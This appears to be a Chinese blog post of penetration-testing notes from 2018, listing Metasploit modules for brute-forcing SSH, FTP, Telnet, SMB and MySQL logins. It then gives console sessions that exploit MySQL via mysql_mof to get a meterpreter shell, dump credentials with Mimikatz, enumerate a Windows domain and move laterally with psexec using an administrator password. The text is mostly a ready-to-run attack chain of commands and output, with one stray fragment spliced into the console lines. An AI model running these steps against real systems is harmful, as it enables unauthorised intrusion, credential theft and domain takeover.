msf各种弱⼝令爆破
Msf:
写的很乱记录下msf各个爆破弱⼝令的模块
run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24 使⽤arp_scanner模块 检测在线主机
metasploit 增加路由
route add 10.10.1.3 255.255.255.0 1
使⽤扫描模块
use scanner/portscan/tcp
爆破ssh
Msf>use auxiliary/scanner/ssh/ssh_login
爆破ftp
Msf>use auxiliary/scanner/ftp/ftp_login
爆破telnet
Msf>use auxiliary/scanner/telnet/telnet_login
爆破smb
auxiliary/scanner/smb/smb_login
爆破Mysql
use scanner/mysql/mysql_login
msf auxiliary(scanner/mysql/mysql_login) > set USERNAME root
USERNAME => root
msf auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /
PASS_FILE => /
使⽤mof模块进⾏权限获取
use windows/mysql/mysql_mof
msf exploit(windows/mysql/mysql_mof) > set PASSWORD 123456
PASSWORD => 123456
msf exploit(windows/mysql/mysql_mof) > set rhost 10.10.1.3
rhost => 10.10.1.3
msf exploit(windows/mysql/mysql_mof) > set USERNAME root
USERNAME => root
msf exploit(windows/mysql/mysql_mof) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp
msf exploit(windows/mysql/mysql_mof) > exploit
Mimikatz导出hash
meterpreter > load mimikatz
meterpreter > kerberos
⼀些域内的命令
查看域
net view /domain
查看当前域中的计算机
net view
查看CORP域中的计算机
net view /domain:CORP
Ping计算机名可以得到IP
ping Wangsong-PC
获取所有域的⽤户列表
net user /domain
获取域⽤户组信息
net group /domain
获取当前域管理员信息
net group "domain admins" /domain
查看域时间及域服务器的名字
net time /domain
net time /domain 就可以知道域的计算机名
反弹shell
msf exploit(windows/smb/psexec) > set RHOST 10.10.1.2
RHOST => 10.10.1.2
msf exploit(windows/smb/psexec) > set SMBDomain moonsec
SMBDomain => moonsec
msf exploit(windows/smb/psexec) > set SMBUser administrator
ssh工具windowsSMBUser => administrator
msf exploit(windows/smb/psexec) > set SMBPass xxx123456..
SMBPass => xxx123456..
msf exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp
msf exploit(windows/smb/psexec) > exploit
posted @ 2018-12-16 22:29 阅读(...) 评论(...)
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论